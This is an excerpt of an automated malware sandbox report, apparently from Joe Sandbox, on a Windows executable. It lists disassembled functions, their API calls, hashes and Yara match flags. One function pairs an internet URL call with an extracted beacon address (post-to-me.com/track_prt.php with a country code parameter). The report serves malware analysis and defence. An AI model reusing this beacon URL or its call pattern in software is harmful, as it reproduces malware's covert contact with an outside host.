                                                      • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D10A,00000000,00000000,0042D948,?,0042D948,?,00000001,0042D10A,23E85006,00000001,0042D948,0042D948), ref: 004368FA
                                                      • __alloca_probe_16.LIBCMT ref: 00436932
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436983
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436995
                                                      • __freea.LIBCMT ref: 0043699E
                                                        • Part of subcall function 004336B7: RtlAllocateHeap.NTDLL(00000000,0040D886,00000000,?,004267AE,00000002,00000000,00000000,00000000,?,0040CD37,0040D886,00000004,00000000,00000000,00000000), ref: 004336E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                      • String ID:
                                                      • API String ID: 313313983-0
                                                      • Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                      • Instruction ID: ba5234b48696d485b191fcf70c43932052d8178864213fa56b0c51d67f083833
                                                      • Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                      • Instruction Fuzzy Hash: 2C311272A0021AABDF249F65CC85EAF7BA5EF04714F05422AFC04D7290EB39DD54CBA4
                                                      Function 0041AED6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _SpinWait.LIBCONCRT ref: 0041AEFB
                                                        • Part of subcall function 00410F31: _SpinWait.LIBCONCRT ref: 00410F49
                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF0F
                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF41
                                                      • List.LIBCMT ref: 0041AFC4
                                                      • List.LIBCMT ref: 0041AFD3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                      • String ID:
                                                      • API String ID: 3281396844-0
                                                      • Opcode ID: 5c6d79d2061d1be3f6f55815ae92c1b0f0a4dcb5fbd971ed29b9e32bad9935db
                                                      • Instruction ID: d76806ffb847d2b8795c0c1ce5cac4184fdf118ee2c1758562e02e1fb281a4c2
                                                      • Opcode Fuzzy Hash: 5c6d79d2061d1be3f6f55815ae92c1b0f0a4dcb5fbd971ed29b9e32bad9935db
                                                      • Instruction Fuzzy Hash: A4318B72902715DFCB14EFA5C6911EEB7B1BF04308F04006FE40167682DB786DA6CB9A
                                                      Function 00402045 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402077
                                                      • GdipAlloc.GDIPLUS(00000010), ref: 0040207F
                                                      • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040209A
                                                      • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020C4
                                                      • GdiplusShutdown.GDIPLUS(?), ref: 004020F0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                      • String ID:
                                                      • API String ID: 2357751836-0
                                                      • Opcode ID: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                      • Instruction ID: f6703a3e164e8a40b248b3ea094e3db2a53e40250f21368f82fe8a57dbb58177
                                                      • Opcode Fuzzy Hash: c047b4a56322b1034ae7938cbcb78c43e1d8d2715f6ad981a1214ddf5e978d77
                                                      • Instruction Fuzzy Hash: 39214FB5A0131AAFCB00DF65DD499AFFBB8FF49741B104136E906E3290D7759901CBA4
                                                      Function 046D50DC Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 046D50B9
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 046D50CD
                                                        • Part of subcall function 046DBDC4: __EH_prolog3_GS.LIBCMT ref: 046DBDCB
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 046D5132
                                                      • __Getcoll.LIBCPMT ref: 046D5141
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 046D5151
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                      • String ID:
                                                      • API String ID: 1844465188-0
                                                      • Opcode ID: b3d25415ebe9df55360aa105a261caa554903da6f74474e9da843092e161a1ac
                                                      • Instruction ID: 076022f2de37cc49f6a28a941a912bf64ee308f557c8ec7b46ca9cf65b12e795
                                                      • Opcode Fuzzy Hash: b3d25415ebe9df55360aa105a261caa554903da6f74474e9da843092e161a1ac
                                                      • Instruction Fuzzy Hash: 38218E71C10308EFEB14EFA0D8447ADBBB0BF54719F10855ED486AB280FBB46944CB95
                                                      Function 00431F6E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,0042EADE,00434D8C,?,00431F18,00000001,00000364,?,0042DFF5,00457910,00000010), ref: 00431F73
                                                      • _free.LIBCMT ref: 00431FA8
                                                      • _free.LIBCMT ref: 00431FCF
                                                      • SetLastError.KERNEL32(00000000), ref: 00431FDC
                                                      • SetLastError.KERNEL32(00000000), ref: 00431FE5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                      • Instruction ID: 0bb4c41d89e8db7ac5360865ccf1e27050dc686f523c1d9b64a0834e8c50356c
                                                      • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                      • Instruction Fuzzy Hash: B101FE36149A007BC6122B756C85E2B162D9FDA77AF20213FF415923F1DB6D8906413D
                                                      Function 047021D5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(046DDAED,046DDAED,00000002,046FED45,04703961,00000000,?,046F6A15,00000002,00000000,00000000,00000000,?,046DCF9E,046DDAED,00000004), ref: 047021DA
                                                      • _free.LIBCMT ref: 0470220F
                                                      • _free.LIBCMT ref: 04702236
                                                      • SetLastError.KERNEL32(00000000,?,046DDAED), ref: 04702243
                                                      • SetLastError.KERNEL32(00000000,?,046DDAED), ref: 0470224C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                      • Instruction ID: a691cba40893d0abed5755985c0d8ed7d88bed38c6f0bc3d55109c11a372fa71
                                                      • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                      • Instruction Fuzzy Hash: B6014E37207700F7D3116B615D4CD1A26DDAFC167A752C564F805923D2FEB1FC055025
                                                      Function 00431EEA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,0042DFF5,00457910,00000010), ref: 00431EEE
                                                      • _free.LIBCMT ref: 00431F21
                                                      • _free.LIBCMT ref: 00431F49
                                                      • SetLastError.KERNEL32(00000000), ref: 00431F56
                                                      • SetLastError.KERNEL32(00000000), ref: 00431F62
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                      • Instruction ID: c5cb8133f503a8bdd3c19ec9c482994fb56af7f8014b937df2e0ecdda01c9ae0
                                                      • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                      • Instruction Fuzzy Hash: AFF0CD3A64CA0037D61637256C06B1B26199FDEB26F21112FF515D23F2EF2DC906456E
                                                      Function 04702151 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,046FA9FC,?,00000000,?,046FCDF6,046D248B,00000000,?,00451F20), ref: 04702155
                                                      • _free.LIBCMT ref: 04702188
                                                      • _free.LIBCMT ref: 047021B0
                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021BD
                                                      • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 047021C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                      • Instruction ID: a258b39263a21e2dfdbfda22392acf9e559856574cbc6cbe745bd7f46edc2e40
                                                      • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                      • Instruction Fuzzy Hash: ACF0F937147600FBE3127764AC0CA1A26E99BC2B2AF618164FA14923D1FE62BD025169
                                                      Function 00417930 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0041274D: TlsGetValue.KERNEL32(?,?,00410B6B,00412C78,00000000,?,00410B49,?,?,?,00000000,?,00000000), ref: 00412753
                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041795A
                                                        • Part of subcall function 00420FC3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FEA
                                                        • Part of subcall function 00420FC3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421003
                                                        • Part of subcall function 00420FC3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421079
                                                        • Part of subcall function 00420FC3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421081
                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417968
                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417972
                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041797C
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041799A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                      • String ID:
                                                      • API String ID: 4266703842-0
                                                      • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                      • Instruction ID: f417206a81147c4d0187a52c5393a837a907a30705d025ad54cd2b8be6e1a527
                                                      • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                      • Instruction Fuzzy Hash: 6AF04631A0022867CB15B72398129EEB7269F91724B00012FF40093293DF6C9E988BCD
                                                      Function 046E7B97 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 046E29B4: TlsGetValue.KERNEL32(?,?,046E0DD2,046E2EDF,00000000,?,046E0DB0,?,?,?,00000000,?,00000000), ref: 046E29BA
                                                      • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 046E7BC1
                                                        • Part of subcall function 046F122A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 046F1251
                                                        • Part of subcall function 046F122A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 046F126A
                                                        • Part of subcall function 046F122A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 046F12E0
                                                        • Part of subcall function 046F122A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 046F12E8
                                                      • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 046E7BCF
                                                      • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 046E7BD9
                                                      • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 046E7BE3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E7C01
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                      • String ID:
                                                      • API String ID: 4266703842-0
                                                      • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                      • Instruction ID: 8a7709d7e1267c49d4c340f1411ad209f6ec00b8d4e6d25339d3ee978ab52371
                                                      • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                      • Instruction Fuzzy Hash: 26F0F635A0121967EF15FB77982087DB7AA8F90A59B04416ED51053290FF24BE0587C9
                                                      Function 00439E55 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00439E6D
                                                        • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
                                                        • Part of subcall function 0043347A: GetLastError.KERNEL32(?,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?,?), ref: 004334A2
                                                      • _free.LIBCMT ref: 00439E7F
                                                      • _free.LIBCMT ref: 00439E91
                                                      • _free.LIBCMT ref: 00439EA3
                                                      • _free.LIBCMT ref: 00439EB5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction ID: 3186ba135eca5673d5c7bcc8988928ed8454316b694184ab3a724b15f8ce2174
                                                      • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction Fuzzy Hash: 61F03C32409200AB9620EB59E487C1777D9AB08711F68694BF058D7761CB7AFC80865D
                                                      Function 0470A0BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 0470A0D4
                                                        • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
                                                        • Part of subcall function 047036E1: GetLastError.KERNEL32(?,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?,?), ref: 04703709
                                                      • _free.LIBCMT ref: 0470A0E6
                                                      • _free.LIBCMT ref: 0470A0F8
                                                      • _free.LIBCMT ref: 0470A10A
                                                      • _free.LIBCMT ref: 0470A11C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction ID: c998cb643e68dbd6b3a8bd0f641cbebbd42dfaab9fd44e25eb391c56f89ae8ad
                                                      • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                      • Instruction Fuzzy Hash: A5F09032507304EB9620EB58F8C6C0A73EDAA11318F64CE05F408D7B91CB33FCA09A69
                                                      Function 0043173A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00431758
                                                        • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
                                                        • Part of subcall function 0043347A: GetLastError.KERNEL32(?,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?,?), ref: 004334A2
                                                      • _free.LIBCMT ref: 0043176A
                                                      • _free.LIBCMT ref: 0043177D
                                                      • _free.LIBCMT ref: 0043178E
                                                      • _free.LIBCMT ref: 0043179F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction ID: 454abaf14396a352ac1c390044266c6093385f19256017a4bffd640af8968fc0
                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction Fuzzy Hash: ABF03070C003109BEE227F25AD414053B60AF2D727B04626BF45697373C739D952DB8E
                                                      Function 0041CCD5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCDF
                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD10
                                                      • GetCurrentThread.KERNEL32 ref: 0041CD19
                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD2C
                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                      • String ID:
                                                      • API String ID: 2583373041-0
                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction ID: ded1bf51efecb4c55d276ac55c376d8f8d8d921828db8f30f7b8cc6bb23b8dff
                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction Fuzzy Hash: 2AF0A776200500ABC625FF26F9918F77775AFC4715340091EE54B07661CF28A9C6D76A
                                                      Function 046ECF3C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 046ECF46
                                                      • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 046ECF77
                                                      • GetCurrentThread.KERNEL32 ref: 046ECF80
                                                      • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 046ECF93
                                                      • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 046ECF9C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                      • String ID:
                                                      • API String ID: 2583373041-0
                                                      • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction ID: f70e126aae42798d0f0c7054f8d0415287b1ce2e4aa9f5cbbb5181fdf0c7311d
                                                      • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                      • Instruction Fuzzy Hash: BBF0A032202A00DBCB25EF22E954CBB73F6AFC4514340490EE98707694EF31B942DB65
                                                      Function 047019A1 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 047019BF
                                                        • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
                                                        • Part of subcall function 047036E1: GetLastError.KERNEL32(?,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?,?), ref: 04703709
                                                      • _free.LIBCMT ref: 047019D1
                                                      • _free.LIBCMT ref: 047019E4
                                                      • _free.LIBCMT ref: 047019F5
                                                      • _free.LIBCMT ref: 04701A06
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction ID: 4c599a85cbf8920d25b8fd2d18c75adf67677f444b55ba05b981ba150356e74f
                                                      • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                      • Instruction Fuzzy Hash: F0F01D70C02350DB9E216F14EC844043BA0EF0A7267004266F802973B2C736E866EB8E
                                                      Function 046D2E7C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 046D2E9F
                                                        • Part of subcall function 046D1321: _wcslen.LIBCMT ref: 046D1328
                                                        • Part of subcall function 046D1321: _wcslen.LIBCMT ref: 046D1344
                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 046D30B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InternetOpen_wcslen
                                                      • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                      • API String ID: 3381584094-4083784958
                                                      • Opcode ID: a99d3caadcfa28d2e70406ca4552f7285cdcb2c2efbe6c94ee4f66f14db2afae
                                                      • Instruction ID: 8fad71961c423f548a81d78e18ec2b6c64504c1552d2a76808b63e755dd4941d
                                                      • Opcode Fuzzy Hash: a99d3caadcfa28d2e70406ca4552f7285cdcb2c2efbe6c94ee4f66f14db2afae
                                                      • Instruction Fuzzy Hash: ED513095E65344A8E320EBB0BC51B352378EF58752F10543BE524CB2F2F7A19A84875E
                                                      Function 0042F728 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6X4BIzTTBR.exe,00000104), ref: 0042F763
                                                      • _free.LIBCMT ref: 0042F82E
                                                      • _free.LIBCMT ref: 0042F838
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                      • API String ID: 2506810119-1363307703
                                                      • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                      • Instruction ID: dbcffc3f1a2e037b3231e9922d1002feded09478037b822c8be7cdb08c61cc45
                                                      • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                      • Instruction Fuzzy Hash: 2431A371B00228ABDB21DF95AC8099FBBFCEF95314B90407BE80597211D7749A44CB54
                                                      Function 046FF98F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6X4BIzTTBR.exe,00000104), ref: 046FF9CA
                                                      • _free.LIBCMT ref: 046FFA95
                                                      • _free.LIBCMT ref: 046FFA9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                      • API String ID: 2506810119-1363307703
